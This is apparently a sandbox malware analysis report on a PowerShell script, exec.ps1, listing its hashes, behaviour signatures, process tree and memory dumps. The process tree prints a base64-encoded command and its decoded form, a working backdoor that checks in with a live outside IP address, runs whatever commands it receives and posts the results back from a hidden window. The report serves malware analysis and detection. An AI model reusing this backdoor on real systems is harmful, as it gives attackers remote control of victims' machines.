f882ea6eaf75be1e20f645f7eb3b4d1dc39b0ea34b7b6f99c9e3d1f76871593e

General

Target

exec.ps1
Size

1KB
MD5

417eb3f1ce2eb3a0cc91e46126664337
SHA1

892aa7314f980770787804615404ca85d59de7c0
SHA256

f882ea6eaf75be1e20f645f7eb3b4d1dc39b0ea34b7b6f99c9e3d1f76871593e
SHA512

760a84a75819b27662aff8e46211535e0d279b78aa8299cb1e2b32ae567909d7afabc6f79af81839f2465549b6387b681dc3e323d3bc2f1dc19095496cb35a4a

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1964	powershell.exe
1264	powershell.exe
1264	powershell.exe
1264	powershell.exe
1992	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1964 wrote to memory of 1264	1964	powershell.exe	29
PID 1964 wrote to memory of 1264	1964	powershell.exe	29
PID 1964 wrote to memory of 1264	1964	powershell.exe	29
PID 1264 wrote to memory of 1992	1264	powershell.exe	30
PID 1264 wrote to memory of 1992	1264	powershell.exe	30
PID 1264 wrote to memory of 1992	1264	powershell.exe	30

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\exec.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkAHMAPQAnADEANgA3AC4AMgAzADUALgA1ADQALgAxADMANQA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAYwBkADAANABmAGEAYwA3AC0AZQBmAGMAOAA3ADEANABiAC0ANAAzAGEAZAA0AGUAYwBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGMAZAAwADQAZgBhAGMANwAvACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAvACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBBAHUAdABoAG8AcgBpAHoAYQB0AGkAbwBuACIAPQAkAGkAfQA7AGYAbwByACAAKAA7ADsAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AZQBmAGMAOAA3ADEANABiACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB4AD0ASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHIAaQAgACQAcAAkAHMALwA0ADMAYQBkADQAZQBjAGMAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ACAALQBCAG8AZAB5ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABlACsAJAByACkAIAAtAGoAbwBpAG4AIAAnACAAJwApAH0AIABzAGwAZQBlAHAAIAAwAC4AOAB9AH0AIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $s='167.235.54.135:8080';$i='cd04fac7-efc8714b-43ad4ecc';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/cd04fac7/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/efc8714b -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/43ad4ecc -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1992

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ed2c86d3278ec0a38da788b10ff98886

SHA1
3f1508a3858c92d6d28e4a4d7388284713249118

SHA256
1a77c69b7581eb6b9882bacd50ad4096c9f96612288ae7ee800653e45d6217ef

SHA512
53cb124eb8193c4491097f93fd2fc624267adb78bfdaaa49c8bb8526199159299b3acb87d64b810be2a8de168fa7613c57cccb95daa21727d1530f541f7e985e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ed2c86d3278ec0a38da788b10ff98886

SHA1
3f1508a3858c92d6d28e4a4d7388284713249118

SHA256
1a77c69b7581eb6b9882bacd50ad4096c9f96612288ae7ee800653e45d6217ef

SHA512
53cb124eb8193c4491097f93fd2fc624267adb78bfdaaa49c8bb8526199159299b3acb87d64b810be2a8de168fa7613c57cccb95daa21727d1530f541f7e985e

Download Submit
memory/1264-65-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/1264-69-0x000000000262B000-0x000000000264A000-memory.dmp

Filesize
124KB

Download
memory/1264-68-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/1264-61-0x000007FEF4460000-0x000007FEF4E83000-memory.dmp

Filesize
10.1MB

Download
memory/1264-62-0x000007FEF3900000-0x000007FEF445D000-memory.dmp

Filesize
11.4MB

Download
memory/1264-66-0x000000000262B000-0x000000000264A000-memory.dmp

Filesize
124KB

Download
memory/1264-64-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/1964-63-0x00000000026AB000-0x00000000026CA000-memory.dmp

Filesize
124KB

Download
memory/1964-71-0x00000000026A4000-0x00000000026A7000-memory.dmp

Filesize
12KB

Download
memory/1964-54-0x000007FEFBFE1000-0x000007FEFBFE3000-memory.dmp

Filesize
8KB

Download
memory/1964-56-0x000007FEF3900000-0x000007FEF445D000-memory.dmp

Filesize
11.4MB

Download
memory/1964-57-0x00000000026A4000-0x00000000026A7000-memory.dmp

Filesize
12KB

Download
memory/1964-55-0x000007FEF4460000-0x000007FEF4E83000-memory.dmp

Filesize
10.1MB

Download
memory/1964-72-0x00000000026AB000-0x00000000026CA000-memory.dmp

Filesize
124KB

Download
memory/1992-74-0x000007FEF4460000-0x000007FEF4E83000-memory.dmp

Filesize
10.1MB

Download
memory/1992-75-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp

Filesize
11.4MB

Download
memory/1992-76-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/1992-77-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/1992-78-0x00000000024DB000-0x00000000024FA000-memory.dmp

Filesize
124KB

Download
memory/1992-79-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads